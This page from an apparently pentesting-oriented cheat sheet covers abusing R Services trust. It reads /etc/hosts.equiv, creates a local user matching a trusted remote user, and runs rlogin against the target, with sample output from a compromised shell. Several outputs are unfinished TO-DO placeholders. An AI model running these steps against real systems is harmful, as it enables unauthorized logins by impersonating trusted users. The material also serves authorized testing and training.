TLDRBins TLDRBins / R Services


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Abuse #1: Fake a User

1. Check

cat /etc/hosts.equiv
Sample Output: (remote) www-data@reset:/home/sadm$ cat /etc/hosts.equiv # /etc/hosts.equiv: list of hosts and users that are granted "trusted" r # command access to your system . - root - local + sadm

2. Create the Target User Locally

# Create a fake user sudo useradd <USER>
Sample Output: TO-DO
# Set password sudo passwd <USER>
Sample Output: $ sudo useradd sadm $ sudo passwd sadm New password: Retype new password: passwd: password updated successfully $ cat /etc/passwd | grep sadm sadm:x:1001:1001::/home/sadm:/bin/sh
# Switch user su <USER>
Sample Output: TO-DO

3. Connect

# Installation sudo apt install rsh-redone-client
Sample Output: TO-DO
# Connect rlogin <TARGET>
Sample Output: TO-DO

4. Revert

sudo userdel <USER>
Sample Output: TO-DO